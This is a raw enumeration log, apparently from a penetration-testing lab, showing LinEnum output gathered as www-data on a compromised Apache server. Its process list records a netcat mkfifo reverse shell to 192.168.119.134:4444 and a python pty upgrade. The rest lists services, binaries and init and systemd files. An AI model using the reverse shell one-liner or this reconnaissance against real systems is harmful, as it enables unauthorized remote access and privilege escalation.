www-data 16539  0.0  0.9 269136  9964 ?        S    07:38   0:00 /usr/sbin/apache2 -k start
root     16649  0.0  0.0      0     0 ?        S    07:39   0:00 [kworker/1:2]
www-data 16660  0.0  1.0 268880 10968 ?        S    07:45   0:00 /usr/sbin/apache2 -k start
root     16678  0.4  0.0      0     0 ?        S    07:51   0:12 [kworker/u4:0]
root     16738  0.0  0.0      0     0 ?        S    08:09   0:00 [kworker/1:1]
www-data 17252  0.0  0.0   4504   852 ?        S    08:25   0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.134 4444 >/tmp/f
www-data 17257  0.0  0.0   4532   776 ?        S    08:25   0:00 cat /tmp/f
www-data 17259  0.0  0.0   4504   708 ?        S    08:25   0:00 /bin/sh -i
www-data 17260  0.0  0.1  11300  1648 ?        S    08:25   0:00 nc 192.168.119.134 4444
www-data 17261  0.0  0.6  32116  6736 ?        S    08:26   0:00 python -c import pty;pty.spawn('/bin/bash')
www-data 17262  0.0  0.3  18212  3224 pts/1    Ss   08:26   0:00 /bin/bash
www-data 17265  0.0  0.6  32116  6832 pts/1    S+   08:26   0:00 python -c import pty;pty.spawn('/bin/bash')
www-data 17266  0.0  0.3  18236  3452 pts/2    Ss   08:26   0:00 /bin/bash
root     17282  0.0  0.0      0     0 ?        S    08:36   0:00 [kworker/u4:2]
www-data 17283  0.0  0.3  19024  3892 pts/2    S+   08:36   0:00 /bin/bash ./LinEnum.sh
www-data 17284  0.0  0.3  19068  3400 pts/2    S+   08:36   0:00 /bin/bash ./LinEnum.sh
www-data 17285  0.0  0.0   4380   652 pts/2    S+   08:36   0:00 tee -a
www-data 17475  0.0  0.2  19052  2756 pts/2    S+   08:36   0:00 /bin/bash ./LinEnum.sh
www-data 17476  0.0  0.2  34428  2904 pts/2    R+   08:36   0:00 ps aux


[00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 root root  1037528 May 16  2017 /bin/bash
lrwxrwxrwx 1 root root        4 Dec 31  2019 /bin/sh -> dash
-rwxr-xr-x 1 root root   326224 Feb  1  2018 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root   618520 Feb  1  2018 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root   141904 Feb  1  2018 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root   453240 Feb  1  2018 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root    44104 Nov 30  2017 /sbin/agetty
lrwxrwxrwx 1 root root       20 Dec 31  2019 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root   783984 Jul 26  2017 /sbin/iscsid
-rwxr-xr-x 1 root root    51336 Apr 16  2016 /sbin/lvmetad
-rwxr-xr-x 1 root root   513216 Nov  8  2017 /sbin/mdadm
-rwxr-xr-x 1 root root   224208 Jan 12  2017 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root    18504 Nov  8  2017 /usr/bin/lxcfs
-rwxr-xr-x 1 root root    44528 Feb 15  2018 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root   164928 Nov  3  2016 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root    15048 Jan 17  2016 /usr/lib/policykit-1/polkitd
-rwxr-xr-x 1 root root 21178072 Nov 30  2017 /usr/lib/snapd/snapd
-rwxr-xr-x 1 root root    48112 Apr  8  2016 /usr/sbin/acpid
-rwxr-xr-x 1 root root   662560 Oct  8  2019 /usr/sbin/apache2
-rwxr-xr-x 1 root root    26632 Jan 14  2016 /usr/sbin/atd
-rwxr-xr-x 1 root root    44472 Apr  5  2016 /usr/sbin/cron
-rwxr-xr-x 1 root root    48440 Apr 11  2016 /usr/sbin/irqbalance
-rwxr-xr-x 1 root root 24544904 Nov 15  2019 /usr/sbin/mysqld
-rwxr-xr-x 1 root root   599328 Apr  5  2016 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root   791024 Jan 18  2018 /usr/sbin/sshd
-rwxr-xr-x 1 root root   168200 Apr 13  2016 /usr/sbin/vsftpd
-rwxr-xr-x 1 root root   170400 Jan 27  2016 /usr/sbin/xinetd


[00;31m[-] Contents of /etc/xinetd.conf:[00m
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{

# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info

}

includedir /etc/xinetd.d


[00;31m[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:[00m
total 36
drwxr-xr-x  2 root root 4096 Dec 31  2019 .
drwxr-xr-x 95 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root  640 Oct 26  2013 chargen
-rw-r--r--  1 root root  502 Oct 26  2013 daytime
-rw-r--r--  1 root root  391 Oct 26  2013 discard
-rw-r--r--  1 root root  422 Oct 26  2013 echo
-rw-r--r--  1 root root  292 Dec 31  2019 rsync00
-rw-r--r--  1 root root  292 Dec 31  2019 rsync01
-rw-r--r--  1 root root  569 Oct 26  2013 time


[00;31m[-] /etc/init.d/ binary permissions:[00m
total 332
drwxr-xr-x  2 root root 4096 Dec 31  2019 .
drwxr-xr-x 95 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root 1264 Dec 31  2019 .depend.boot
-rw-r--r--  1 root root 1167 Dec 31  2019 .depend.start
-rw-r--r--  1 root root 1293 Dec 31  2019 .depend.stop
-rw-r--r--  1 root root 2427 Jan 19  2016 README
-rwxr-xr-x  1 root root 2243 Feb  9  2016 acpid
-rwxr-xr-x  1 root root 2210 Jun 11  2018 apache-htcacheclean
-rwxr-xr-x  1 root root 8087 Jun 11  2018 apache2
-rwxr-xr-x  1 root root 6223 Mar  3  2017 apparmor
-rwxr-xr-x  1 root root 2802 Jan  2  2018 apport
-rwxr-xr-x  1 root root 1071 Dec  6  2015 atd
-rwxr-xr-x  1 root root 1275 Jan 19  2016 bootmisc.sh
-rwxr-xr-x  1 root root 3807 Jan 19  2016 checkfs.sh
-rwxr-xr-x  1 root root 1098 Jan 19  2016 checkroot-bootclean.sh
-rwxr-xr-x  1 root root 9353 Jan 19  2016 checkroot.sh
-rwxr-xr-x  1 root root 1343 Apr  4  2016 console-setup
-rwxr-xr-x  1 root root 3049 Apr  5  2016 cron
-rwxr-xr-x  1 root root  937 Mar 28  2015 cryptdisks
-rwxr-xr-x  1 root root  896 Mar 28  2015 cryptdisks-early
-rwxr-xr-x  1 root root 2813 Dec  1  2015 dbus
-rwxr-xr-x  1 root root 1105 Apr 26  2019 grub-common
-rwxr-xr-x  1 root root 1336 Jan 19  2016 halt
-rwxr-xr-x  1 root root 1423 Jan 19  2016 hostname.sh
-rwxr-xr-x  1 root root 3809 Mar 12  2016 hwclock.sh
-rwxr-xr-x  1 root root 2372 Apr 11  2016 irqbalance
-rwxr-xr-x  1 root root 1503 Mar 29  2016 iscsid
-rwxr-xr-x  1 root root 1804 Apr  4  2016 keyboard-setup
-rwxr-xr-x  1 root root 1300 Jan 19  2016 killprocs
-rwxr-xr-x  1 root root 2087 Dec 20  2015 kmod
-rwxr-xr-x  1 root root  695 Oct 30  2015 lvm2
-rwxr-xr-x  1 root root  571 Oct 30  2015 lvm2-lvmetad
-rwxr-xr-x  1 root root  586 Oct 30  2015 lvm2-lvmpolld
-rwxr-xr-x  1 root root 2378 Nov  8  2017 lxcfs
-rwxr-xr-x  1 root root 2541 Dec  7  2017 lxd
-rwxr-xr-x  1 root root 2365 Oct  9  2017 mdadm
-rwxr-xr-x  1 root root 1199 Jul 16  2014 mdadm-waitidle
-rwxr-xr-x  1 root root  703 Jan 19  2016 mountall-bootclean.sh
-rwxr-xr-x  1 root root 2301 Jan 19  2016 mountall.sh
-rwxr-xr-x  1 root root 1461 Jan 19  2016 mountdevsubfs.sh
-rwxr-xr-x  1 root root 1564 Jan 19  2016 mountkernfs.sh
-rwxr-xr-x  1 root root  711 Jan 19  2016 mountnfs-bootclean.sh
-rwxr-xr-x  1 root root 2456 Jan 19  2016 mountnfs.sh
-rwxr-xr-x  1 root root 5607 Feb  3  2017 mysql
-rwxr-xr-x  1 root root 4771 Jul 19  2015 networking
-rwxr-xr-x  1 root root 1581 Oct 15  2015 ondemand
-rwxr-xr-x  1 root root 2503 Mar 29  2016 open-iscsi
-rwxr-xr-x  1 root root 1578 Feb 15  2018 open-vm-tools
-rwxr-xr-x  1 root root 1366 Nov 15  2015 plymouth
-rwxr-xr-x  1 root root  752 Nov 15  2015 plymouth-log
-rwxr-xr-x  1 root root 1192 Sep  6  2015 procps
-rwxr-xr-x  1 root root 6366 Jan 19  2016 rc
-rwxr-xr-x  1 root root  820 Jan 19  2016 rc.local
-rwxr-xr-x  1 root root  117 Jan 19  2016 rcS
-rwxr-xr-x  1 root root  661 Jan 19  2016 reboot
-rwxr-xr-x  1 root root 4149 Nov 23  2015 resolvconf
-rwxr-xr-x  1 root root 4355 Jul 10  2014 rsync
-rwxr-xr-x  1 root root 2796 Feb  3  2016 rsyslog
-rwxr-xr-x  1 root root 1226 Jun  9  2015 screen-cleanup
-rwxr-xr-x  1 root root 3927 Jan 19  2016 sendsigs
-rwxr-xr-x  1 root root  597 Jan 19  2016 single
-rw-r--r--  1 root root 1087 Jan 19  2016 skeleton
-rwxr-xr-x  1 root root 4077 Mar 16  2017 ssh
-rwxr-xr-x  1 root root 6087 Apr 12  2016 udev
-rwxr-xr-x  1 root root 2049 Aug  7  2014 ufw
-rwxr-xr-x  1 root root 2737 Jan 19  2016 umountfs
-rwxr-xr-x  1 root root 2202 Jan 19  2016 umountnfs.sh
-rwxr-xr-x  1 root root 1879 Jan 19  2016 umountroot
-rwxr-xr-x  1 root root 1391 Apr 20  2017 unattended-upgrades
-rwxr-xr-x  1 root root 3111 Jan 19  2016 urandom
-rwxr-xr-x  1 root root 1306 Nov 30  2017 uuidd
-rwxr-xr-x  1 root root 2031 Feb 10  2016 vsftpd
-rwxr-xr-x  1 root root 2443 Oct 26  2013 xinetd


[00;31m[-] /etc/init/ config file permissions:[00m
total 160
drwxr-xr-x  2 root root 4096 Dec 31  2019 .
drwxr-xr-x 95 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root  338 Apr  8  2016 acpid.conf
-rw-r--r--  1 root root 3709 Mar  3  2017 apparmor.conf
-rw-r--r--  1 root root 1629 Jan  2  2018 apport.conf
-rw-r--r--  1 root root  250 Apr  4  2016 console-font.conf
-rw-r--r--  1 root root  509 Apr  4  2016 console-setup.conf
-rw-r--r--  1 root root  297 Apr  5  2016 cron.conf
-rw-r--r--  1 root root  412 Mar 28  2015 cryptdisks-udev.conf
-rw-r--r--  1 root root 1519 Mar 28  2015 cryptdisks.conf
-rw-r--r--  1 root root  482 Sep  1  2015 dbus.conf
-rw-r--r--  1 root root 1247 Jun  1  2015 friendly-recovery.conf
-rw-r--r--  1 root root  284 Jul 23  2013 hostname.conf
-rw-r--r--  1 root root  300 May 21  2014 hostname.sh.conf
-rw-r--r--  1 root root  561 Mar 14  2016 hwclock-save.conf
-rw-r--r--  1 root root  674 Mar 14  2016 hwclock.conf
-rw-r--r--  1 root root  109 Mar 14  2016 hwclock.sh.conf
-rw-r--r--  1 root root  597 Apr 11  2016 irqbalance.conf
-rw-r--r--  1 root root  689 Aug 20  2015 kmod.conf
-rw-r--r--  1 root root  540 Nov  8  2017 lxcfs.conf
-rw-r--r--  1 root root  813 Dec  7  2017 lxd.conf
-rw-r--r--  1 root root 1757 Feb  3  2017 mysql.conf
-rw-r--r--  1 root root  530 Jun  2  2015 network-interface-container.conf
-rw-r--r--  1 root root 1756 Jun  2  2015 network-interface-security.conf
-rw-r--r--  1 root root  933 Jun  2  2015 network-interface.conf
-rw-r--r--  1 root root 2493 Jun  2  2015 networking.conf
-rw-r--r--  1 root root  568 Feb  1  2016 passwd.conf
-rw-r--r--  1 root root  363 Jun  5  2014 procps-instance.conf
-rw-r--r--  1 root root  119 Jun  5  2014 procps.conf
-rw-r--r--  1 root root  457 Jun  3  2015 resolvconf.conf
-rw-r--r--  1 root root  426 Dec  2  2015 rsyslog.conf
-rw-r--r--  1 root root  230 Apr  4  2016 setvtrgb.conf
-rw-r--r--  1 root root  641 Mar 16  2017 ssh.conf
-rw-r--r--  1 root root  337 Apr 12  2016 udev.conf
-rw-r--r--  1 root root  360 Apr 12  2016 udevmonitor.conf
-rw-r--r--  1 root root  352 Apr 12  2016 udevtrigger.conf
-rw-r--r--  1 root root  473 Aug  7  2014 ufw.conf
-rw-r--r--  1 root root  683 Feb 24  2015 ureadahead-other.conf
-rw-r--r--  1 root root  889 Feb 24  2015 ureadahead.conf
-rw-r--r--  1 root root 1481 Sep 17  2015 xinetd.conf


[00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 8.3M
drwxr-xr-x 27 root root  20K Dec 31  2019 system
drwxr-xr-x  2 root root 4.0K Dec 31  2019 system-shutdown
drwxr-xr-x  2 root root 4.0K Dec 31  2019 system-generators
drwxr-xr-x  2 root root 4.0K Dec 31  2019 system-sleep
drwxr-xr-x  2 root root 4.0K Dec 31  2019 system-preset
drwxr-xr-x  2 root root 4.0K Dec 31  2019 network
-rwxr-xr-x  1 root root 443K Feb  1  2018 systemd-udevd
-rwxr-xr-x  1 root root 1.6M Feb  1  2018 systemd
-rwxr-xr-x  1 root root  47K Feb  1  2018 systemd-binfmt
-rwxr-xr-x  1 root root 143K Feb  1  2018 systemd-shutdown
-rwxr-xr-x  1 root root 103K Feb  1  2018 systemd-bootchart
-rwxr-xr-x  1 root root 268K Feb  1  2018 systemd-cgroups-agent
-rwxr-xr-x  1 root root 301K Feb  1  2018 systemd-fsck
-rwxr-xr-x  1 root root  31K Feb  1  2018 systemd-hibernate-resume
-rwxr-xr-x  1 root root 332K Feb  1  2018 systemd-hostnamed
-rwxr-xr-x  1 root root 605K Feb  1  2018 systemd-logind
-rwxr-xr-x  1 root root 123K Feb  1  2018 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  35K Feb  1  2018 systemd-random-seed
-rwxr-xr-x  1 root root  51K Feb  1  2018 systemd-remount-fs
-rwxr-xr-x  1 root root  31K Feb  1  2018 systemd-reply-password
-rwxr-xr-x  1 root root 657K Feb  1  2018 systemd-resolved
-rwxr-xr-x  1 root root  71K Feb  1  2018 systemd-sleep
-rwxr-xr-x  1 root root  91K Feb  1  2018 systemd-socket-proxyd
-rwxr-xr-x  1 root root 333K Feb  1  2018 systemd-timedated
-rwxr-xr-x  1 root root 139K Feb  1  2018 systemd-timesyncd
-rwxr-xr-x  1 root root  35K Feb  1  2018 systemd-user-sessions
-rwxr-xr-x  1 root root  15K Feb  1  2018 systemd-ac-power
-rwxr-xr-x  1 root root  55K Feb  1  2018 systemd-activate
-rwxr-xr-x  1 root root  91K Feb  1  2018 systemd-backlight
-rwxr-xr-x  1 root root 352K Feb  1  2018 systemd-bus-proxyd
-rwxr-xr-x  1 root root  91K Feb  1  2018 systemd-cryptsetup
-rwxr-xr-x  1 root root  75K Feb  1  2018 systemd-fsckd
-rwxr-xr-x  1 root root 276K Feb  1  2018 systemd-initctl
-rwxr-xr-x  1 root root 319K Feb  1  2018 systemd-journald
-rwxr-xr-x  1 root root 340K Feb  1  2018 systemd-localed
-rwxr-xr-x  1 root root  51K Feb  1  2018 systemd-modules-load
-rwxr-xr-x  1 root root 828K Feb  1  2018 systemd-networkd
-rwxr-xr-x  1 root root  35K Feb  1  2018 systemd-quotacheck
-rwxr-xr-x  1 root root  91K Feb  1  2018 systemd-rfkill
-rwxr-xr-x  1 root root  51K Feb  1  2018 systemd-sysctl
-rwxr-xr-x  1 root root 276K Feb  1  2018 systemd-update-utmp
-rwxr-xr-x  1 root root 1.3K Oct 26  2017 systemd-sysv-install

/lib/systemd/system:
total 960K
drwxr-xr-x 2 root root 4.0K Dec 31  2019 apache2.service.d
lrwxrwxrwx 1 root root    9 Dec 31  2019 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 31  2019 halt.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 systemd-resolved.service.d
drwxr-xr-x 2 root root 4.0K Dec 31  2019 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4.0K Dec 31  2019 timers.target.wants
lrwxrwxrwx 1 root root   21 Dec 31  2019 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 Dec 31  2019 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Dec 31  2019 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root    9 Dec 31  2019 x11-common.service -> /dev/null
lrwxrwxrwx 1 root root   14 Dec 31  2019 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Dec 31  2019 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Dec 31  2019 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Dec 31  2019 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Dec 31  2019 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Dec 31  2019 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 Dec 31  2019 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root   24 Dec 31  2019 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root   25 Dec 31  2019 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 Dec 31  2019 default.target -> graphical.target
lrwxrwxrwx 1 root root    9 Dec 31  2019 fuse.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 31  2019 getty.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 graphical.target.wants
lrwxrwxrwx 1 root root    9 Dec 31  2019 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 Dec 31  2019 kmod.service -> systemd-modules-load.service
drwxr-xr-x 2 root root 4.0K Dec 31  2019 local-fs.target.wants
lrwxrwxrwx 1 root root   28 Dec 31  2019 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Dec 31  2019 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 Dec 31  2019 procps.service -> systemd-sysctl.service
drwxr-xr-x 2 root root 4.0K Dec 31  2019 rc-local.service.d
lrwxrwxrwx 1 root root   16 Dec 31  2019 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Dec 31  2019 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 reboot.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 31  2019 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Dec 31  2019 resolvconf.service.wants
lrwxrwxrwx 1 root root    9 Dec 31  2019 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Dec 31  2019 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Dec 31  2019 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Dec 31  2019 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Dec 31  2019 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Dec 31  2019 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Dec 31  2019 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Dec 31  2019 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Dec 31  2019 sendsigs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 31  2019 sigpwr.target.wants
lrwxrwxrwx 1 root root    9 Dec 31  2019 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Dec 31  2019 stop-bootlogd.service -> /dev/null
-rw-r--r-- 1 root root  155 Dec 18  2019 phpsessionclean.service
-rw-r--r-- 1 root root  144 Dec 18  2019 phpsessionclean.timer
-rw-r--r-- 1 root root  238 May  7  2019 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 May  7  2019 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  225 May  7  2019 apt-daily.service
-rw-r--r-- 1 root root  156 May  7  2019 apt-daily.timer
drwxr-xr-x 2 root root 4.0K Feb 28  2018 busnames.target.wants
-rw-r--r-- 1 root root  251 Feb 15  2018 open-vm-tools.service
-rw-r--r-- 1 root root  403 Feb  1  2018 -.slice
-rw-r--r-- 1 root root  879 Feb  1  2018 basic.target
-rw-r--r-- 1 root root  379 Feb  1  2018 bluetooth.target
-rw-r--r-- 1 root root  358 Feb  1  2018 busnames.target
-rw-r--r-- 1 root root  770 Feb  1  2018 console-getty.service
-rw-r--r-- 1 root root  742 Feb  1  2018 console-shell.service
-rw-r--r-- 1 root root  791 Feb  1  2018 container-getty@.service
-rw-r--r-- 1 root root  394 Feb  1  2018 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 Feb  1  2018 cryptsetup.target
-rw-r--r-- 1 root root 1010 Feb  1  2018 debug-shell.service
-rw-r--r-- 1 root root  670 Feb  1  2018 dev-hugepages.mount
-rw-r--r-- 1 root root  624 Feb  1  2018 dev-mqueue.mount
-rw-r--r-- 1 root root 1009 Feb  1  2018 emergency.service
-rw-r--r-- 1 root root  431 Feb  1  2018 emergency.target
-rw-r--r-- 1 root root  501 Feb  1  2018 exit.target
-rw-r--r-- 1 root root  440 Feb  1  2018 final.target
-rw-r--r-- 1 root root  460 Feb  1  2018 getty.target
-rw-r--r-- 1 root root 1.5K Feb  1  2018 getty@.service
-rw-r--r-- 1 root root  558 Feb  1  2018 graphical.target
-rw-r--r-- 1 root root  487 Feb  1  2018 halt.target
-rw-r--r-- 1 root root  447 Feb  1  2018 hibernate.target
-rw-r--r-- 1 root root  468 Feb  1  2018 hybrid-sleep.target
-rw-r--r-- 1 root root  630 Feb  1  2018 initrd-cleanup.service
-rw-r--r-- 1 root root  553 Feb  1  2018 initrd-fs.target
-rw-r--r-- 1 root root  790 Feb  1  2018 initrd-parse-etc.service
-rw-r--r-- 1 root root  526 Feb  1  2018 initrd-root-fs.target
-rw-r--r-- 1 root root  640 Feb  1  2018 initrd-switch-root.service
-rw-r--r-- 1 root root  691 Feb  1  2018 initrd-switch-root.target
-rw-r--r-- 1 root root  664 Feb  1  2018 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  671 Feb  1  2018 initrd.target
-rw-r--r-- 1 root root  501 Feb  1  2018 kexec.target
-rw-r--r-- 1 root root  677 Feb  1  2018 kmod-static-nodes.service
-rw-r--r-- 1 root root  395 Feb  1  2018 local-fs-pre.target
-rw-r--r-- 1 root root  507 Feb  1  2018 local-fs.target
-rw-r--r-- 1 root root  405 Feb  1  2018 machine.slice
-rw-r--r-- 1 root root  473 Feb  1  2018 mail-transport-agent.target
-rw-r--r-- 1 root root  492 Feb  1  2018 multi-user.target
-rw-r--r-- 1 root root  464 Feb  1  2018 network-online.target
-rw-r--r-- 1 root root  461 Feb  1  2018 network-pre.target
-rw-r--r-- 1 root root  480 Feb  1  2018 network.target
-rw-r--r-- 1 root root  514 Feb  1  2018 nss-lookup.target
-rw-r--r-- 1 root root  473 Feb  1  2018 nss-user-lookup.target
-rw-r--r-- 1 root root  354 Feb  1  2018 paths.target
-rw-r--r-- 1 root root  552 Feb  1  2018 poweroff.target
-rw-r--r-- 1 root root  377 Feb  1  2018 printer.target
-rw-r--r-- 1 root root  693 Feb  1  2018 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 Feb  1  2018 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  568 Feb  1  2018 quotaon.service
-rw-r--r-- 1 root root  612 Feb  1  2018 rc-local.service
-rw-r--r-- 1 root root  543 Feb  1  2018 reboot.target
-rw-r--r-- 1 root root  396 Feb  1  2018 remote-fs-pre.target
-rw-r--r-- 1 root root  482 Feb  1  2018 remote-fs.target
-rw-r--r-- 1 root root  978 Feb  1  2018 rescue.service
-rw-r--r-- 1 root root  486 Feb  1  2018 rescue.target
-rw-r--r-- 1 root root  500 Feb  1  2018 rpcbind.target
-rw-r--r-- 1 root root 1.1K Feb  1  2018 serial-getty@.service
-rw-r--r-- 1 root root  402 Feb  1  2018 shutdown.target
-rw-r--r-- 1 root root  362 Feb  1  2018 sigpwr.target
-rw-r--r-- 1 root root  420 Feb  1  2018 sleep.target
-rw-r--r-- 1 root root  409 Feb  1  2018 slices.target
-rw-r--r-- 1 root root  380 Feb  1  2018 smartcard.target
-rw-r--r-- 1 root root  356 Feb  1  2018 sockets.target
-rw-r--r-- 1 root root  380 Feb  1  2018 sound.target
-rw-r--r-- 1 root root  441 Feb  1  2018 suspend.target
-rw-r--r-- 1 root root  353 Feb  1  2018 swap.target
-rw-r--r-- 1 root root  715 Feb  1  2018 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  719 Feb  1  2018 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 Feb  1  2018 sys-kernel-debug.mount
-rw-r--r-- 1 root root  518 Feb  1  2018 sysinit.target
-rw-r--r-- 1 root root 1.3K Feb  1  2018 syslog.socket
-rw-r--r-- 1 root root  585 Feb  1  2018 system-update.target
-rw-r--r-- 1 root root  436 Feb  1  2018 system.slice
-rw-r--r-- 1 root root  646 Feb  1  2018 systemd-ask-password-console.path
-rw-r--r-- 1 root root  653 Feb  1  2018 systemd-ask-password-console.service
-rw-r--r-- 1 root root  574 Feb  1  2018 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  681 Feb  1  2018 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  724 Feb  1  2018 systemd-backlight@.service
-rw-r--r-- 1 root root  959 Feb  1  2018 systemd-binfmt.service
-rw-r--r-- 1 root root  650 Feb  1  2018 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Feb  1  2018 systemd-bus-proxyd.service
-rw-r--r-- 1 root root  409 Feb  1  2018 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root  497 Feb  1  2018 systemd-exit.service
-rw-r--r-- 1 root root  674 Feb  1  2018 systemd-fsck-root.service
-rw-r--r-- 1 root root  648 Feb  1  2018 systemd-fsck@.service
-rw-r--r-- 1 root root  551 Feb  1  2018 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Feb  1  2018 systemd-fsckd.socket
-rw-r--r-- 1 root root  544 Feb  1  2018 systemd-halt.service
-rw-r--r-- 1 root root  631 Feb  1  2018 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  501 Feb  1  2018 systemd-hibernate.service
-rw-r--r-- 1 root root  710 Feb  1  2018 systemd-hostnamed.service
-rw-r--r-- 1 root root  778 Feb  1  2018 systemd-hwdb-update.service
-rw-r--r-- 1 root root  519 Feb  1  2018 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  480 Feb  1  2018 systemd-initctl.service
-rw-r--r-- 1 root root  524 Feb  1  2018 systemd-initctl.socket
-rw-r--r-- 1 root root  731 Feb  1  2018 systemd-journal-flush.service
-rw-r--r-- 1 root root  607 Feb  1  2018 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Feb  1  2018 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 1.3K Feb  1  2018 systemd-journald.service
-rw-r--r-- 1 root root  842 Feb  1  2018 systemd-journald.socket
-rw-r--r-- 1 root root  557 Feb  1  2018 systemd-kexec.service
-rw-r--r-- 1 root root  691 Feb  1  2018 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Feb  1  2018 systemd-logind.service
